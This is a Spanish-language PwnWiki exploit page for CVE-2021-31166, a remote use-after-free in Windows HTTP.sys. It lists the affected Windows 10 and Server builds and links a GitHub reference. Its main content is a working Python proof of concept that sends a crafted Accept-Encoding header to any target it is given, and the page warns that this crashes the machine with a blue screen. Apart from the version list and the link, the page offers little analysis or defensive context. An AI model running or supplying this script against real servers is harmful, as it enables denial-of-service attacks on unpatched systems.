CVE-2021-31166 Vulnerabilidad de ejecución remota de código de pila de protocolo HTTP

From PwnWiki
Revision as of 09:40, 18 May 2021 by Pwnwiki (talk | contribs) (Created page with "== Impacto de la vulnerabilidad ==")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Bahasa Indonesia • ‎Chinese • ‎Deutsch • ‎English • ‎Nederlands • ‎Türkçe • ‎español • ‎français • ‎português • ‎русский • ‎українська • ‎עברית • ‎العربية • ‎中文(台灣)‎ • ‎日本語

Impacto de la vulnerabilidad

Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server, version 2004 (Server Core installation)
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems

POC

⚠️️Aparecerá una pantalla azul cuando se ejecute el POC. 

# Axel '0vercl0k' Souchet - May 16 2021
import requests
import argparse

def main():
    parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys')
    parser.add_argument('--target', required = True)
    args = parser.parse_args()
    r = requests.get(f'http://{args.target}/', headers = {
        'Accept-Encoding': 'doar-e, ftw, imo, ,',
    })
    print(r)

main()

GIF

Windows.gif


Referencia

https://github.com/0vercl0k/CVE-2021-31166

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-31166_HTTP協議棧遠程代碼執行漏洞/es&oldid=2918"